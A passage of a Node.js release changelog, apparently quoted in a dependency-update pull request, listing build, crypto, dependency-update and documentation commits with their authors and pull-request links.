[#&#8203;61151](https://redirect.github.com/nodejs/node/pull/61151)
-
\[[`d60a6cebd5`](https://redirect.github.com/nodejs/node/commit/d60a6cebd5)]
- **build**: update test-wpt-report to use NODE instead of OUT\_NODE
(Filip Skokan)
[#&#8203;61024](https://redirect.github.com/nodejs/node/pull/61024)
-
\[[`34ccf187f5`](https://redirect.github.com/nodejs/node/commit/34ccf187f5)]
- **build**: skip build-ci on actions with a separate test step
(Chengzhong Wu)
[#&#8203;61073](https://redirect.github.com/nodejs/node/pull/61073)
-
\[[`7b19e101a2`](https://redirect.github.com/nodejs/node/commit/7b19e101a2)]
- **build**: run embedtest with node\_g when BUILDTYPE=Debug (Chengzhong
Wu) [#&#8203;60850](https://redirect.github.com/nodejs/node/pull/60850)
-
\[[`9408c4459f`](https://redirect.github.com/nodejs/node/commit/9408c4459f)]
- **build**: upgrade Python linter ruff, add rules ASYNC,PERF (Christian
Clauss)
[#&#8203;59984](https://redirect.github.com/nodejs/node/pull/59984)
-
\[[`2166ec7f0f`](https://redirect.github.com/nodejs/node/commit/2166ec7f0f)]
- **build**: use call command when calling python configure (Jacob
Nichols)
[#&#8203;60098](https://redirect.github.com/nodejs/node/pull/60098)
-
\[[`73ef70145d`](https://redirect.github.com/nodejs/node/commit/73ef70145d)]
- **build**: remove V8\_COMPRESS\_POINTERS\_IN\_ISOLATE\_CAGE defs
(Joyee Cheung)
[#&#8203;60296](https://redirect.github.com/nodejs/node/pull/60296)
-
\[[`7b93a65f27`](https://redirect.github.com/nodejs/node/commit/7b93a65f27)]
- **build**: test on Python 3.14 (Christian Clauss)
[#&#8203;59983](https://redirect.github.com/nodejs/node/pull/59983)
-
\[[`508ce6ec6c`](https://redirect.github.com/nodejs/node/commit/508ce6ec6c)]
- **build, src**: fix include paths for vtune files (Rahul)
[#&#8203;59999](https://redirect.github.com/nodejs/node/pull/59999)
-
\[[`c89d3cd570`](https://redirect.github.com/nodejs/node/commit/c89d3cd570)]
- **build,tools**: fix addon build deadlock on errors (Vladimir Morozov)
[#&#8203;61321](https://redirect.github.com/nodejs/node/pull/61321)
-
\[[`40904a0591`](https://redirect.github.com/nodejs/node/commit/40904a0591)]
- **build,win**: update WinGet configurations to Python 3.14 (Mike
McCready)
[#&#8203;61431](https://redirect.github.com/nodejs/node/pull/61431)
-
\[[`6d6742e7db`](https://redirect.github.com/nodejs/node/commit/6d6742e7db)]
- **child\_process**: treat ipc length header as unsigned uint32 (Ryuhei
Shima)
[#&#8203;61344](https://redirect.github.com/nodejs/node/pull/61344)
-
\[[`6063d888fe`](https://redirect.github.com/nodejs/node/commit/6063d888fe)]
- **cli**: mark --heapsnapshot-near-heap-limit as stable (Joyee Cheung)
[#&#8203;60956](https://redirect.github.com/nodejs/node/pull/60956)
-
\[[`3d324a0f88`](https://redirect.github.com/nodejs/node/commit/3d324a0f88)]
- **cluster**: fix port reuse between cluster (Ryuhei Shima)
[#&#8203;60141](https://redirect.github.com/nodejs/node/pull/60141)
-
\[[`40a58709b4`](https://redirect.github.com/nodejs/node/commit/40a58709b4)]
- **console**: optimize single-string logging (Gürgün Dayıoğlu)
[#&#8203;60422](https://redirect.github.com/nodejs/node/pull/60422)
-
\[[`d950b151a2`](https://redirect.github.com/nodejs/node/commit/d950b151a2)]
- **crypto**: update root certificates to NSS 3.119 (Node.js GitHub Bot)
[#&#8203;61419](https://redirect.github.com/nodejs/node/pull/61419)
-
\[[`4f42f8c428`](https://redirect.github.com/nodejs/node/commit/4f42f8c428)]
- **crypto**: update root certificates to NSS 3.117 (Node.js GitHub Bot)
[#&#8203;60741](https://redirect.github.com/nodejs/node/pull/60741)
-
\[[`a87499ae25`](https://redirect.github.com/nodejs/node/commit/a87499ae25)]
- **crypto**: ensure documented RSA-PSS saltLength default is used
(Filip Skokan)
[#&#8203;60662](https://redirect.github.com/nodejs/node/pull/60662)
-
\[[`8c65cc11e2`](https://redirect.github.com/nodejs/node/commit/8c65cc11e2)]
- **crypto**: update root certificates to NSS 3.116 (Node.js GitHub Bot)
[#&#8203;59956](https://redirect.github.com/nodejs/node/pull/59956)
-
\[[`91dc00a2c1`](https://redirect.github.com/nodejs/node/commit/91dc00a2c1)]
- **debugger**: fix event listener leak in the run command (Joyee
Cheung)
[#&#8203;60464](https://redirect.github.com/nodejs/node/pull/60464)
-
\[[`0781bd3764`](https://redirect.github.com/nodejs/node/commit/0781bd3764)]
- **deps**: V8: backport
[`6a0a25a`](https://redirect.github.com/nodejs/node/commit/6a0a25abaed3)
(Vivian Wang)
[#&#8203;61688](https://redirect.github.com/nodejs/node/pull/61688)
-
\[[`0cf1f9c3e9`](https://redirect.github.com/nodejs/node/commit/0cf1f9c3e9)]
- **deps**: update googletest to
[`8508785`](https://redirect.github.com/nodejs/node/commit/85087857ad10bd407cd6ed2f52f7ea9752db621f)
(Node.js GitHub Bot)
[#&#8203;61417](https://redirect.github.com/nodejs/node/pull/61417)
-
\[[`521b4b1f07`](https://redirect.github.com/nodejs/node/commit/521b4b1f07)]
- **deps**: update sqlite to 3.51.2 (Node.js GitHub Bot)
[#&#8203;61339](https://redirect.github.com/nodejs/node/pull/61339)
-
\[[`58b9d219a3`](https://redirect.github.com/nodejs/node/commit/58b9d219a3)]
- **deps**: update icu to 78.2 (Node.js GitHub Bot)
[#&#8203;60523](https://redirect.github.com/nodejs/node/pull/60523)
-
\[[`cbc1e4306d`](https://redirect.github.com/nodejs/node/commit/cbc1e4306d)]
- **deps**: update zlib to 1.3.1-e00f703 (Node.js GitHub Bot)
[#&#8203;61135](https://redirect.github.com/nodejs/node/pull/61135)
-
\[[`db59c35ed8`](https://redirect.github.com/nodejs/node/commit/db59c35ed8)]
- **deps**: update cjs-module-lexer to 2.2.0 (Node.js GitHub Bot)
[#&#8203;61271](https://redirect.github.com/nodejs/node/pull/61271)
-
\[[`c18518ee3c`](https://redirect.github.com/nodejs/node/commit/c18518ee3c)]
- **deps**: update nbytes to 0.1.2 (Node.js GitHub Bot)
[#&#8203;61270](https://redirect.github.com/nodejs/node/pull/61270)
-
\[[`376df62d63`](https://redirect.github.com/nodejs/node/commit/376df62d63)]
- **deps**: update timezone to 2025c (Node.js GitHub Bot)
[#&#8203;61138](https://redirect.github.com/nodejs/node/pull/61138)
-
\[[`993e905302`](https://redirect.github.com/nodejs/node/commit/993e905302)]
- **deps**: update simdjson to 4.2.4 (Node.js GitHub Bot)
[#&#8203;61056](https://redirect.github.com/nodejs/node/pull/61056)
-
\[[`b72fd2a5d3`](https://redirect.github.com/nodejs/node/commit/b72fd2a5d3)]
- **deps**: update googletest to
[`065127f`](https://redirect.github.com/nodejs/node/commit/065127f1e4b46c5f14fc73cf8d323c221f9dc68e)
(Node.js GitHub Bot)
[#&#8203;61055](https://redirect.github.com/nodejs/node/pull/61055)
-
\[[`d765147405`](https://redirect.github.com/nodejs/node/commit/d765147405)]
- **deps**: update sqlite to 3.51.1 (Node.js GitHub Bot)
[#&#8203;60899](https://redirect.github.com/nodejs/node/pull/60899)
-
\[[`37abe2a7d2`](https://redirect.github.com/nodejs/node/commit/37abe2a7d2)]
- **deps**: update zlib to 1.3.1-63d7e16 (Node.js GitHub Bot)
[#&#8203;60898](https://redirect.github.com/nodejs/node/pull/60898)
-
\[[`97241fcb86`](https://redirect.github.com/nodejs/node/commit/97241fcb86)]
- **deps**: update sqlite to 3.51.0 (Node.js GitHub Bot)
[#&#8203;60614](https://redirect.github.com/nodejs/node/pull/60614)
-
\[[`3669c7b4f4`](https://redirect.github.com/nodejs/node/commit/3669c7b4f4)]
- **deps**: update simdjson to 4.2.2 (Node.js GitHub Bot)
[#&#8203;60740](https://redirect.github.com/nodejs/node/pull/60740)
-
\[[`9a056ec89c`](https://redirect.github.com/nodejs/node/commit/9a056ec89c)]
- **deps**: update googletest to
[`1b96fa1`](https://redirect.github.com/nodejs/node/commit/1b96fa13f549387b7549cc89e1a785cf143a1a50)
(Node.js GitHub Bot)
[#&#8203;60739](https://redirect.github.com/nodejs/node/pull/60739)
-
\[[`b5803b3ea0`](https://redirect.github.com/nodejs/node/commit/b5803b3ea0)]
- **deps**: update minimatch to 10.1.1 (Node.js GitHub Bot)
[#&#8203;60543](https://redirect.github.com/nodejs/node/pull/60543)
-
\[[`5bf99f3d46`](https://redirect.github.com/nodejs/node/commit/5bf99f3d46)]
- **deps**: update cjs-module-lexer to 2.1.1 (Node.js GitHub Bot)
[#&#8203;60646](https://redirect.github.com/nodejs/node/pull/60646)
-
\[[`801f187357`](https://redirect.github.com/nodejs/node/commit/801f187357)]
- **deps**: update simdjson to 4.2.1 (Node.js GitHub Bot)
[#&#8203;60644](https://redirect.github.com/nodejs/node/pull/60644)
-
\[[`03c16e5a4c`](https://redirect.github.com/nodejs/node/commit/03c16e5a4c)]
- **deps**: update simdjson to 4.1.0 (Node.js GitHub Bot)
[#&#8203;60542](https://redirect.github.com/nodejs/node/pull/60542)
-
\[[`2ebfc2ca56`](https://redirect.github.com/nodejs/node/commit/2ebfc2ca56)]
- **deps**: update amaro to 1.1.5 (Node.js GitHub Bot)
[#&#8203;60541](https://redirect.github.com/nodejs/node/pull/60541)
-
\[[`d24ba4fed6`](https://redirect.github.com/nodejs/node/commit/d24ba4fed6)]
- **deps**: update simdjson to 4.0.7 (Node.js GitHub Bot)
[#&#8203;59883](https://redirect.github.com/nodejs/node/pull/59883)
-
\[[`9480a139bf`](https://redirect.github.com/nodejs/node/commit/9480a139bf)]
- **deps**: update googletest to
[`279f847`](https://redirect.github.com/nodejs/node/commit/279f847)
(Node.js GitHub Bot)
[#&#8203;60219](https://redirect.github.com/nodejs/node/pull/60219)
-
\[[`635e67379e`](https://redirect.github.com/nodejs/node/commit/635e67379e)]
- **deps**: update archs files for openssl-3.5.5 (Node.js GitHub Bot)
[#&#8203;61547](https://redirect.github.com/nodejs/node/pull/61547)
-
\[[`c7b774047d`](https://redirect.github.com/nodejs/node/commit/c7b774047d)]
- **deps**: upgrade openssl sources to openssl-3.5.5 (Node.js GitHub
Bot) [#&#8203;61547](https://redirect.github.com/nodejs/node/pull/61547)
-
\[[`5b324d7d7f`](https://redirect.github.com/nodejs/node/commit/5b324d7d7f)]
- **deps**: update corepack to 0.34.6 (Node.js GitHub Bot)
[#&#8203;61510](https://redirect.github.com/nodejs/node/pull/61510)
-
\[[`eef8ba0667`](https://redirect.github.com/nodejs/node/commit/eef8ba0667)]
- **deps**: update corepack to 0.34.5 (Node.js GitHub Bot)
[#&#8203;60842](https://redirect.github.com/nodejs/node/pull/60842)
-
\[[`490f7c7fb1`](https://redirect.github.com/nodejs/node/commit/490f7c7fb1)]
- **deps**: update corepack to 0.34.4 (Node.js GitHub Bot)
[#&#8203;60643](https://redirect.github.com/nodejs/node/pull/60643)
-
\[[`66903ea3b3`](https://redirect.github.com/nodejs/node/commit/66903ea3b3)]
- **deps**: update corepack to 0.34.2 (Node.js GitHub Bot)
[#&#8203;60550](https://redirect.github.com/nodejs/node/pull/60550)
-
\[[`a2f0b69282`](https://redirect.github.com/nodejs/node/commit/a2f0b69282)]
- **deps**: update corepack to 0.34.1 (Node.js GitHub Bot)
[#&#8203;60314](https://redirect.github.com/nodejs/node/pull/60314)
-
\[[`c8044a48a6`](https://redirect.github.com/nodejs/node/commit/c8044a48a6)]
- **deps**: V8: backport
[`2e4c5cf`](https://redirect.github.com/nodejs/node/commit/2e4c5cf9b112)
(Michaël Zasso)
[#&#8203;60654](https://redirect.github.com/nodejs/node/pull/60654)
-
\[[`642f518198`](https://redirect.github.com/nodejs/node/commit/642f518198)]
- **doc**: supported toolchain with Visual Studio 2022 only (Mike
McCready)
[#&#8203;61451](https://redirect.github.com/nodejs/node/pull/61451)
-
\[[`625f674487`](https://redirect.github.com/nodejs/node/commit/625f674487)]
- **doc**: move Security-Team from TSC to SECURITY (Rafael Gonzaga)
[#&#8203;61495](https://redirect.github.com/nodejs/node/pull/61495)
-
\[[`029e32f8ba`](https://redirect.github.com/nodejs/node/commit/029e32f8ba)]
- **doc**: added `requestOCSP` option to `tls.connect` (ikeyan)
[#&#8203;61064](https://redirect.github.com/nodejs/node/pull/61064)
-
\[[`68e33dfa89`](https://redirect.github.com/nodejs/node/commit/68e33dfa89)]
- **doc**: restore
[@&#8203;ChALkeR](https://redirect.github.com/ChALkeR) to collaborators
(Сковорода Никита Андреевич)
[#&#8203;61553](https://redirect.github.com/nodejs/node/pull/61553)
-
\[[`e016770d62`](https://redirect.github.com/nodejs/node/commit/e016770d62)]
- **doc**: update IBM/Red Hat volunteers with dedicated project time
(Beth Griggs)
[#&#8203;61588](https://redirect.github.com/nodejs/node/pull/61588)
-
\[[`ec63954657`](https://redirect.github.com/nodejs/node/commit/ec63954657)]
- **doc**: mention constructor comparison in assert.deepStrictEqual
(Hamza Kargin)
[#&#8203;60253](https://redirect.github.com/nodejs/node/pull/60253)
-
\[[`c8e1563a98`](https://redirect.github.com/nodejs/node/commit/c8e1563a98)]
- **doc**: add CVE delay mention (Rafael Gonzaga)
[#&#8203;61465](https://redirect.github.com/nodejs/node/pull/61465)
-
\[[`4b00cf2b54`](https://redirect.github.com/nodejs/node/commit/4b00cf2b54)]
- **doc**: include OpenJSF handle for security stewards (Rafael Gonzaga)
[#&#8203;61454](https://redirect.github.com/nodejs/node/pull/61454)
-
\[[`4b73bf5bc8`](https://redirect.github.com/nodejs/node/commit/4b73bf5bc8)]
- **doc**: clarify process.argv\[1] behavior for -e/--eval (Jeevankumar
S) [#&#8203;61366](https://redirect.github.com/nodejs/node/pull/61366)
-
\[[`d3151df4b3`](https://redirect.github.com/nodejs/node/commit/d3151df4b3)]
- **doc**: remove Windows Dev Home instructions from BUILDING (Mike
McCready)
[#&#8203;61434](https://redirect.github.com/nodejs/node/pull/61434)
-
\[[`2323462e35`](https://redirect.github.com/nodejs/node/commit/2323462e35)]
- **doc**: clarify TypedArray properties on Buffer (Roman Reiss)
[#&#8203;61355](https://redirect.github.com/nodejs/node/pull/61355)
-
\[[`6c5478c8b2`](https://redirect.github.com/nodejs/node/commit/6c5478c8b2)]
- **doc**: note resume build should not be done on node-test-commit
(Stewart X Addison)
[#&#8203;61373](https://redirect.github.com/nodejs/node/pull/61373)
-
\[[`ba4a043103`](https://redirect.github.com/nodejs/node/commit/ba4a043103)]
- **doc**: refine WebAssembly error documentation (sangwook)
[#&#8203;61382](https://redirect.github.com/nodejs/node/pull/61382)
-
\[[`cd315ea589`](https://redirect.github.com/nodejs/node/commit/cd315ea589)]
- **doc**: add deprecation history for url.parse (Eng Zer Jun)
[#&#8203;61389](https://redirect.github.com/nodejs/node/pull/61389)
-
\[[`42db0c392d`](https://redirect.github.com/nodejs/node/commit/42db0c392d)]
- **doc**: add marco and rafael in last sec release (Marco Ippolito)
[#&#8203;61383](https://redirect.github.com/nodejs/node/pull/61383)
-
\[[`4c3b680fc7`](https://redirect.github.com/nodejs/node/commit/4c3b680fc7)]
- **doc**: packages: example of private import switch to internal
(coderaiser)
[#&#8203;61343](https://redirect.github.com/nodejs/node/pull/61343)
-
\[[`684d15e421`](https://redirect.github.com/nodejs/node/commit/684d15e421)]
- **doc**: add esm and cjs examples to node:v8 (Alfredo González)
[#&#8203;61328](https://redirect.github.com/nodejs/node/pull/61328)
-
\[[`c3f9c7a7d9`](https://redirect.github.com/nodejs/node/commit/c3f9c7a7d9)]
- **doc**: added 'secure' event to tls.TLSSocket (ikeyan)
[#&#8203;61066](https://redirect.github.com/nodejs/node/pull/61066)
-
\[[`aa9acad5ca`](https://redirect.github.com/nodejs/node/commit/aa9acad5ca)]
- **doc**: restore
[@&#8203;watilde](https://redirect.github.com/watilde) to collaborators
(Daijiro Wachi)
[#&#8203;61350](https://redirect.github.com/nodejs/node/pull/61350)
-
\[[`9cafec084e`](https://redirect.github.com/nodejs/node/commit/9cafec084e)]
- **doc**: run license-builder (github-actions\[bot])
[#&#8203;61348](https://redirect.github.com/nodejs/node/pull/61348)
-
\[[`cdb12ccbc6`](https://redirect.github.com/nodejs/node/commit/cdb12ccbc6)]
- **doc**: document ALPNCallback option for TLSSocket constructor
(ikeyan)
[#&#8203;61331](https://redirect.github.com/nodejs/node/pull/61331)
-
\[[`461c5e65c5`](https://redirect.github.com/nodejs/node/commit/461c5e65c5)]
- **doc**: update MDN links (Livia Medeiros)
[#&#8203;61062](https://redirect.github.com/nodejs/node/pull/61062)
-
\[[`dde45baeab`](https://redirect.github.com/nodejs/node/commit/dde45baeab)]
- **doc**: add documentation for process.traceProcessWarnings (Alireza
Ebrahimkhani)
[#&#8203;53641](https://redirect.github.com/nodejs/node/pull/53641)
-
\[[`59a7aeec92`](https://redirect.github.com/nodejs/node/commit/59a7aeec92)]
- **doc**: fix filename typo (Hardanish Singh)
[#&#8203;61297](https://redirect.github.com/nodejs/node/pull/61297)
-
\[[`9a0a40d1ed`](https://redirect.github.com/nodejs/node/commit/9a0a40d1ed)]
- **doc**: fix typos and grammar in `BUILDING.md` & `onboarding.md`
(Hardanish Singh)
[#&#8203;61267](https://redirect.github.com/nodejs/node/pull/61267)
-
\[[`dca7005f9d`](https://redirect.github.com/nodejs/node/commit/dca7005f9d)]
- **doc**: mention --newVersion release script (Rafael Gonzaga)
[#&#8203;61255](https://redirect.github.com/nodejs/node/pull/61255)
-
\[[`c0dc8ddf85`](https://redirect.github.com/nodejs/node/commit/c0dc8ddf85)]
- **doc**: correct typo in api contributing doc (Mike McCready)
[#&#8203;61260](https://redirect.github.com/nodejs/node/pull/61260)
-
\[[`066af38fe1`](https://redirect.github.com/nodejs/node/commit/066af38fe1)]
- **doc**: add PR-URL requirement for security backports (Rafael
Gonzaga)
[#&#8203;61256](https://redirect.github.com/nodejs/node/pull/61256)
-
\[[`71dd46bd0c`](https://redirect.github.com/nodejs/node/commit/71dd46bd0c)]
- **doc**: add reusePort error behavior to net module (mag123c)
[#&#8203;61250](https://redirect.github.com/nodejs/node/pull/61250)
-
\[[`f6abe3ba33`](https://redirect.github.com/nodejs/node/commit/f6abe3ba33)]
- **doc**: note corepack package removal in distribution doc (Mike
McCready)
[#&#8203;61207](https://redirect.github.com/nodejs/node/pull/61207)
-
\[[`9059d49d8c`](https://redirect.github.com/nodejs/node/commit/9059d49d8c)]
- **doc**: fix tls.connect() timeout documentation (Azad Gupta)
[#&#8203;61079](https://redirect.github.com/nodejs/node/pull/61079)
-
\[[`e7b34b76b0`](https://redirect.github.com/nodejs/node/commit/e7b34b76b0)]
- **doc**: missing `passed`, `error` and `passed` properties on
`TestContext` (Xavier Stouder)
[#&#8203;61185](https://redirect.github.com/nodejs/node/pull/61185)
-
\[[`9ae2dcfbb6`](https://redirect.github.com/nodejs/node/commit/9ae2dcfbb6)]
- **doc**: clarify threat model for application-level API exposure
(Rafael Gonzaga)
[#&#8203;61184](https://redirect.github.com/nodejs/node/pull/61184)
-
\[[`9902331a7c`](https://redirect.github.com/nodejs/node/commit/9902331a7c)]
- **doc**: correct options for net.Socket class and socket.connect
(Xavier Stouder)
[#&#8203;61179](https://redirect.github.com/nodejs/node/pull/61179)
-
\[[`a80122d2fe`](https://redirect.github.com/nodejs/node/commit/a80122d2fe)]
- **doc**: document error event on readline InterfaceConstructor (Xavier
Stouder)
[#&#8203;61170](https://redirect.github.com/nodejs/node/pull/61170)
-
\[[`38d73c9cfa`](https://redirect.github.com/nodejs/node/commit/38d73c9cfa)]
- **doc**: add a smooth scrolling effect to the sidebar (btea)
[#&#8203;59007](https://redirect.github.com/nodejs/node/pull/59007)
-
\[[`95c51fa984`](https://redirect.github.com/nodejs/node/commit/95c51fa984)]
- **doc**: correct invalid collaborator profile (JJ)
[#&#8203;61091](https://redirect.github.com/nodejs/node/pull/61091)
-
\[[`f5a044763c`](https://redirect.github.com/nodejs/node/commit/f5a044763c)]
- **doc**: exclude compile-time flag features from security policy
(Matteo Collina)
[#&#8203;61109](https://redirect.github.com/nodejs/node/pull/61109)
-
\[[`b6ebf2cd53`](https://redirect.github.com/nodejs/node/commit/b6ebf2cd53)]
- **doc**: add
[@&#8203;avivkeller](https://redirect.github.com/avivkeller) to
collaborators (Aviv Keller)
[#&#8203;61115](https://redirect.github.com/nodejs/node/pull/61115)
-
\[[`35854f424d`](https://redirect.github.com/nodejs/node/commit/35854f424d)]
- **doc**: add gurgunday to collaborators (Gürgün Dayıoğlu)
[#&#8203;61094](https://redirect.github.com/nodejs/node/pull/61094)
-
\[[`4932322c29`](https://redirect.github.com/nodejs/node/commit/4932322c29)]
- **doc**: add File modes cross-references in fs methods (Mohit Raj
Saxena)
[#&#8203;60286](https://redirect.github.com/nodejs/node/pull/60286)
-
\[[`c84904e047`](https://redirect.github.com/nodejs/node/commit/c84904e047)]
- **doc**: add missing `zstd` to mjs example of zlib (Deokjin Kim)
[#&#8203;60915](https://redirect.github.com/nodejs/node/pull/60915)
-
\[[`e615b9e2f2`](https://redirect.github.com/nodejs/node/commit/e615b9e2f2)]
- **doc**: clarify fileURLToPath security considerations (Rafael
Gonzaga)
[#&#8203;60887](https://redirect.github.com/nodejs/node/pull/60887)
-
\[[`99e384e6d4`](https://redirect.github.com/nodejs/node/commit/99e384e6d4)]
- **doc**: replace column with columnNumber in example of
`util.getCallSites` (Deokjin Kim)
[#&#8203;60881](https://redirect.github.com/nodejs/node/pull/60881)
-
\[[`9351bb4d02`](https://redirect.github.com/nodejs/node/commit/9351bb4d02)]
- **doc**: correct spelling in BUILDING.md (Rich Trott)
[#&#8203;60875](https://redirect.github.com/nodejs/node/pull/60875)
-
\[[`e1f6e7fc4d`](https://redirect.github.com/nodejs/node/commit/e1f6e7fc4d)]
- **doc**: update debuglog examples to use 'foo-bar' instead of 'foo'
(xiaoyao)
[#&#8203;60867](https://redirect.github.com/nodejs/node/pull/60867)
-
\[[`ccbb2d7300`](https://redirect.github.com/nodejs/node/commit/ccbb2d7300)]
- **doc**: fix typos in changelogs (Rich Trott)
[#&#8203;60855](https://redirect.github.com/nodejs/node/pull/60855)
-
\[[`1cb2fe8b35`](https://redirect.github.com/nodejs/node/commit/1cb2fe8b35)]
- **doc**: mark module.register as active development (Chengzhong Wu)
[#&#8203;60849](https://redirect.github.com/nodejs/node/pull/60849)
-
\[[`ceeb4968a6`](https://redirect.github.com/nodejs/node/commit/ceeb4968a6)]
- **doc**: add fullName property to SuiteContext (PaulyBearCoding)
[#&#8203;60762](https://redirect.github.com/nodejs/node/pull/60762)
-
\[[`56155909dd`](https://redirect.github.com/nodejs/node/commit/56155909dd)]
- **doc**: keep sidebar module visible when navigating docs (Botato)
[#&#8203;60410](https://redirect.github.com/nodejs/node/pull/60410)
-
\[[`6b637763d5`](https://redirect.github.com/nodejs/node/commit/6b637763d5)]
- **doc**: correct concurrency wording in test() documentation (Azad
Gupta)
[#&#8203;60773](https://redirect.github.com/nodejs/node/pull/60773)
-
\[[`7183e8ffa1`](https://redirect.github.com/nodejs/node/commit/7183e8ffa1)]
- **doc**: clarify that CQ only picks up PRs targeting `main` (René)
[#&#8203;60731](https://redirect.github.com/nodejs/node/pull/60731)
-
\[[`d5d94303be`](https://redirect.github.com/nodejs/node/commit/d5d94303be)]
- **doc**: clarify license section and add contributor note
(KaleruMadhu)
[#&#8203;60590](https://redirect.github.com/nodejs/node/pull/60590)
-
\[[`e0210c8f53`](https://redirect.github.com/nodejs/node/commit/e0210c8f53)]
- **doc**: correct tls ALPNProtocols types (René)
[#&#8203;60143](https://redirect.github.com/nodejs/node/pull/60143)
-
\[[`eff87b498a`](https://redirect.github.com/nodejs/node/commit/eff87b498a)]
- **doc**: remove mention of SMS 2FA (Antoine du Hamel)
[#&#8203;60707](https://redirect.github.com/nodejs/node/pull/60707)
-
\[[`e77ef94a51`](https://redirect.github.com/nodejs/node/commit/e77ef94a51)]
- **doc**: `domain.add()` does not accept timer objects (René)
[#&#8203;60675](https://redirect.github.com/nodejs/node/pull/60675)
-
\[[`4fe19c95ea`](https://redirect.github.com/nodejs/node/commit/4fe19c95ea)]
- **doc**: update Collaborators list to reflect hybrist handle change
(Antoine du Hamel)
[#&#8203;60650](https://redirect.github.com/nodejs/node/pull/60650)
-
\[[`eece59b6ce`](https://redirect.github.com/nodejs/node/commit/eece59b6ce)]
- **doc**: fix linter issues (Antoine du Hamel)
[#&#8203;60636](https://redirect.github.com/nodejs/node/pull/60636)
-
\[[`6e17e596e4`](https://redirect.github.com/nodejs/node/commit/6e17e596e4)]
- **doc**: correct values/references for buffer.kMaxLength (René)
[#&#8203;60305](https://redirect.github.com/nodejs/node/pull/60305)
-
\[[`ac327ae9a7`](https://redirect.github.com/nodejs/node/commit/ac327ae9a7)]
- **doc**: recommend events.once to manage 'close' event (Dan Fabulich)
[#&#8203;60017](https://redirect.github.com/nodejs/node/pull/60017)
-
\[[`d9b149ea42`](https://redirect.github.com/nodejs/node/commit/d9b149ea42)]
- **doc**: highlight module loading difference between import and
require (Ajay A)
[#&#8203;59815](https://redirect.github.com/nodejs/node/pull/59815)
-
\[[`f6d62cb22c`](https://redirect.github.com/nodejs/node/commit/f6d62cb22c)]
- **doc**: fix typo in `process.unref` documentation (우혁)
[#&#8203;59698](https://redirect.github.com/nodejs/node/pull/59698)
-
\[[`6d5078b196`](https://redirect.github.com/nodejs/node/commit/6d5078b196)]
- **doc**: add some entries to `glossary.md` (Mohataseem Khan)
[#&#8203;59277](https://redirect.github.com/nodejs/node/pull/59277)
-
\[[`b0a5820dea`](https://redirect.github.com/nodejs/node/commit/b0a5820dea)]
- **doc**: improve agent.createConnection docs for http and https agents
(JaeHo Jang)
[#&#8203;58205](https://redirect.github.com/nodejs/node/pull/58205)
-
\[[`b5db02fe67`](https://redirect.github.com/nodejs/node/commit/b5db02fe67)]
- **doc**: fix pseudo code in modules.md (chirsz)
[#&#8203;57677](https://redirect.github.com/nodejs/node/pull/57677)
-
\[[`e9b912d481`](https://redirect.github.com/nodejs/node/commit/e9b912d481)]
- **doc**: add missing variable in code snippet (Koushil Mankali)
[#&#8203;55478](https://redirect.github.com/nodejs/node/pull/55478)
-
\[[`44c06c7812`](https://redirect.github.com/nodejs/node/commit/44c06c7812)]
- **doc**: add missing word in `single-executable-applications.md`
(Konstantin Tsabolov)
[#&#8203;53864](https://redirect.github.com/nodejs/node/pull/53864)
-
\[[`482b43f160`](https://redirect.github.com/nodejs/node/commit/482b43f160)]
- **doc**: fix typo in http.md (Michael Solomon)
[#&#8203;59354](https://redirect.github.com/nodejs/node/pull/59354)
-
\[[`cd323bc718`](https://redirect.github.com/nodejs/node/commit/cd323bc718)]
- **doc**: update devcontainer.json and add documentation (Joyee Cheung)
[#&#8203;60472](https://redirect.github.com/nodejs/node/pull/60472)
-
\[[`c7c70f3a16`](https://redirect.github.com/nodejs/node/commit/c7c70f3a16)]
- **doc**: add haramj as triager (Haram Jeong)
[#&#8203;60348](https://redirect.github.com/nodejs/node/pull/60348)
-
\[[`04b8c4d14e`](https://redirect.github.com/nodejs/node/commit/04b8c4d14e)]
- **doc**: clarify require(esm) description (dynst)
[#&#8203;60520](https://redirect.github.com/nodejs/node/pull/60520)
-
\[[`de382dc832`](https://redirect.github.com/nodejs/node/commit/de382dc832)]
- **doc**: instantiate resolver object (Donghoon Nam)
[#&#8203;60476](https://redirect.github.com/nodejs/node/pull/60476)
-
\[[`b6845ce460`](https://redirect.github.com/nodejs/node/commit/b6845ce460)]
- **doc**: clarify --use-system-ca support status (Joyee Cheung)
[#&#8203;60340](https://redirect.github.com/nodejs/node/pull/60340)
-
\[[`0894dae9bc`](https://redirect.github.com/nodejs/node/commit/0894dae9bc)]
- **doc**: add missing CAA type to dns.resolveAny() &
dnsPromises.resolveAny() (Jimmy Leung)
[#&#8203;58899](https://redirect.github.com/nodejs/node/pull/58899)
-
\[[`c86a69f692`](https://redirect.github.com/nodejs/node/commit/c86a69f692)]
- **doc**: use `any` for `worker_threads.Worker` 'error' event argument
`err` (Jonas Geiler)
[#&#8203;60300](https://redirect.github.com/nodejs/node/pull/60300)
-
\[[`0c5031e233`](https://redirect.github.com/nodejs/node/commit/0c5031e233)]
- **doc**: update decorator documentation to reflect actual policy
(Muhammad Salman Aziz)
[#&#8203;60288](https://redirect.github.com/nodejs/node/pull/60288)
-
\[[`b01f710175`](https://redirect.github.com/nodejs/node/commit/b01f710175)]
- **doc**: document wildcard supported by tools/test.py (Joyee Cheung)
[#&#8203;60265](https://redirect.github.com/nodejs/node/pull/60265)
-
\[[`b4524dabcc`](https://redirect.github.com/nodejs/node/commit/b4524dabcc)]
- **doc**: fix `blob.bytes()` heading level (XTY)
[#&#8203;60252](https://redirect.github.com/nodejs/node/pull/60252)
-
\[[`5df02776e3`](https://redirect.github.com/nodejs/node/commit/5df02776e3)]
- **doc**: fix not working code example in vm docs (Artur Gawlik)
[#&#8203;60224](https://redirect.github.com/nodejs/node/pull/60224)
-
\[[`6a4359a0b5`](https://redirect.github.com/nodejs/node/commit/6a4359a0b5)]
- **doc**: improve code snippet alternative of url.parse() using WHATWG
URL (Steven)
[#&#8203;60209](https://redirect.github.com/nodejs/node/pull/60209)
-
\[[`ad06bee70d`](https://redirect.github.com/nodejs/node/commit/ad06bee70d)]
- **doc**: use markdown when branch-diff major release (Rafael Gonzaga)
[#&#8203;60179](https://redirect.github.com/nodejs/node/pull/60179)
-
\[[`c0d4b11ed4`](https://redirect.github.com/nodejs/node/commit/c0d4b11ed4)]
- **doc**: update teams in collaborator-guide.md and add links (Bart
Louwers)
[#&#8203;60065](https://redirect.github.com/nodejs/node/pull/60065)
-
\[[`20b5ffcac3`](https://redirect.github.com/nodejs/node/commit/20b5ffcac3)]
- **doc**: update previous version links in BUILDING (Mike McCready)
[#&#8203;61457](https://redirect.github.com/nodejs/node/pull/61457)
-
